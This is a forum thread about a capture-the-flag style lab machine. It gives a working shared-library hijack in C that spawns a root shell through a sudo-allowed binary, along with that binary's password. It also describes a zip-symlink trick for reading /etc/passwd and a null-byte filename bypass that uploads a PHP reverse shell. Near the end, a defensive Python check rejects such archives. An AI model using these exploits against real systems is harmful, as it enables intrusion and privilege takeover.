Posts: 27
Threads: 2
Joined: Jun 2023
Aug 28, 2023, 06:12 AM
(This post was last modified: Aug 28, 2023, 06:18 AM by randomname188.)
For privesc, you can see the binary /usr/bin/stock when you call "sudo -l".
You can reverse engineer the binary and find the password, and find that it loads the shared object from /home/rektsu/.config/libcounter.so.
To exploit, you need to create a malicious libcounter.so binary.
Example code (filename: exploit.c):
#include <stdlib.h>   /* system() */
#include <unistd.h>
/* destructor: runs when the library is unloaded, i.e. when the program exits */
void begin (void) __attribute__((destructor));
void begin (void) {
    system("bash -p");
}
Compile the code like this on the target machine:
gcc -shared -o /home/rektsu/.config/libcounter.so -fPIC exploit.c
Then you can run the binary with sudo:
sudo /usr/bin/stock
# password: St0ckM4nager
Press 3 to exit and you get a root shell.
Posts: 60
Threads: 1
Joined: Jun 2023
Was anyone able to find another path to user using zip slip and XSS + RCE? I'm having a hard time believing that the null-byte terminator filtering bypass trick was intended when there's a file disclosure vulnerability and XSS.
Posts: 1
Threads: 0
Joined: Aug 2023
how
How do I find user.txt and other useful stuff when privileges are restricted, and how can I navigate the system using symlinks when I have no idea where I am or what folder I have to access?
Posts: 6
Threads: 0
Joined: Aug 2023
(Aug 27, 2023, 02:19 AM)LoadError Wrote: (Aug 27, 2023, 01:47 AM)hooneyman Wrote: Yes, got user and shell.. now trying to ROOT. -.- I think reversing is the path.
Can read user.txt but how did you get foothold?
Hi, I'm trying to use a zip symlink to load "/etc/passwd" into file.pdf.
I'm trying to do something like:
ln -s ../../../../etc/passwd symindex.pdf
zip --symlinks test.zip symindex.pdf
But after successfully uploading the zip file, I'm not able to load the PDF file.
Could you give me some hint? I'm not able to read files.
Posts: 6
Threads: 0
Joined: Aug 2023
(Aug 27, 2023, 04:03 PM)frfrfrfrfrfrf Wrote: (Aug 27, 2023, 03:52 PM)hackxor Wrote: (Aug 27, 2023, 03:36 PM)SingaporeFriend Wrote: Normal upload protection bypasses work, if you managed to create a file with those characters inside the zip.
I've tried using double extension, null byte at the end, and some other techniques, but nothing worked as well; I can upload the file but it's always going to be a PDF, and using the zip symlink I got "/shop/index.php", but I didn't know if it's possible to bypass the
$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';
so how did you trigger the file?
To get the rev shell: Give it a name, for example, shell.phpA.pdf. Compress it. You don't need to do any tricks with symbolic links. Open it in hexedit and change the 'A' to 00 (null byte). Upload this and go to the end point of the file you are given. Delete the <space> .pdf in the url. You will get a shell.
I've done this multiple times but instead after removing %20.pdf I get a 404 for some stupid reason.
Posts: 6
Threads: 0
Joined: Aug 2023
(Sep 01, 2023, 12:29 PM)braindust Wrote: (Aug 27, 2023, 04:03 PM)frfrfrfrfrfrf Wrote: (Aug 27, 2023, 03:52 PM)hackxor Wrote: (Aug 27, 2023, 03:36 PM)SingaporeFriend Wrote: Normal upload protection bypasses work, if you managed to create a file with those characters inside the zip.
I've tried using double extension, null byte at the end, and some other techniques, but nothing worked as well; I can upload the file but it's always going to be a PDF, and using the zip symlink I got "/shop/index.php", but I didn't know if it's possible to bypass the
$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';
so how did you trigger the file?
To get the rev shell: Give it a name, for example, shell.phpA.pdf. Compress it. You don't need to do any tricks with symbolic links. Open it in hexedit and change the 'A' to 00 (null byte). Upload this and go to the end point of the file you are given. Delete the <space> .pdf in the url. You will get a shell.
I've done this multiple times but instead after removing %20.pdf I get a 404 for some stupid reason.
Well, I got it after a bit. When using hexedit, you will see shell.phpA.pdf in two places; just do the second one, and follow @frfrfrfrfrfrf.
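Added here as a defender's example (not code from the thread or from the box): an upload-side check that inspects a zip without extracting it and rejects the three things discussed above, a symlink entry like the one `zip --symlinks` produces, an entry whose path escapes the upload directory (zip slip), and an entry whose name does not end in .pdf (the shell.php + null-byte trick). The sample archive it builds is constructed; the entry names are taken from the posts above.

```python
import io
import stat
import zipfile

ALLOWED_EXT = ".pdf"

def check_zip_upload(data: bytes) -> list:
    """Reasons to reject an uploaded zip, found without extracting it.
    Flags symlink entries (Unix mode bits in external_attr), NUL bytes in
    names, paths that escape the upload directory, and non-.pdf extensions.
    """
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if stat.S_ISLNK((info.external_attr >> 16) & 0xFFFF):
                problems.append(f"{name!r}: symlink entry")
            # zipfile cuts names at the first NUL, so "shell.php\0.pdf" is seen as
            # "shell.php" and fails the extension test; keep the explicit check anyway.
            if "\x00" in name:
                problems.append(f"{name!r}: NUL byte in name")
            if name.startswith("/") or ".." in name.replace("\\", "/").split("/"):
                problems.append(f"{name!r}: path escapes the upload directory")
            if not name.lower().endswith(ALLOWED_EXT):
                problems.append(f"{name!r}: extension is not {ALLOWED_EXT}")
    return problems

def make_zip(entries) -> bytes:
    """Constructed sample archive. entries: (name, payload); a str payload is
    written as a symlink entry pointing at it (what `zip --symlinks` does)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in entries:
            info = zipfile.ZipInfo(name)
            info.filename = name  # keep the raw name even if it contains a NUL
            if isinstance(payload, str):
                info.external_attr = (stat.S_IFLNK | 0o777) << 16
                payload = payload.encode()
            zf.writestr(info, payload)
    return buf.getvalue()

if __name__ == "__main__":
    sample = make_zip([
        ("report.pdf", b"%PDF-1.4 constructed sample"),
        ("symindex.pdf", "../../../../etc/passwd"),
        ("shell.php\x00.pdf", b"not a pdf"),
        ("../shop/evil.pdf", b"not a pdf"),
    ])
    for reason in check_zip_upload(sample):
        print("REJECT", reason)
```

Only the clean report.pdf passes; each of the other three entries is reported with its own reason, which is what an upload handler should log before discarding the archive.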
Posts: 19,947
Threads: 357
Joined: Jun 2023
The last non-spam response in the topic was more than a month ago. I'm closing the topic as irrelevant to prevent spam. If this is not the case, please send a PM and I will open the topic for discussion again.